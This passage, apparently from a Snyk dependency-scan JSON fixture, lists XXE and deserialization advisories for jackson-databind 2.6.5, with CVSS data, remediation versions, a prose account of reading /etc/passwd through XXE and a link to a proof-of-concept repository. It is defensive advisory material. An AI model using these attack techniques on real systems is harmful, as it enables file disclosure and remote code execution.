"severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:31.367594Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 5.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. 
By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", - "epssDetails": { - "percentile": "0.68432", - "probability": "0.00275", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25649" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-288c-cq4h-88gq" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-04T11:58:40.054903Z", - "functions_new": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - 
"functionId": { - "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-04T11:54:03Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-04T15:22:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.249736Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": 
[ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:42.491903Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35490" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:37:26.422837Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:32:48Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:26.923105Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", - "title": 
"Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.762302Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. 
Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35491" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:40:53.658144Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:40:13Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:57.453912Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "bu5yer" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2999", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-35728", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "assigner": "NVD", - 
"severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:43.478254Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", - "epssDetails": { - "percentile": "0.80006", - "probability": "0.00674", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35728" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-27T14:34:18.527699Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": 
"2020-12-27T14:05:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-27T17:34:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.852735Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - 
"url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.093517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36187" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T12:47:33.579319Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T12:44:41Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": 
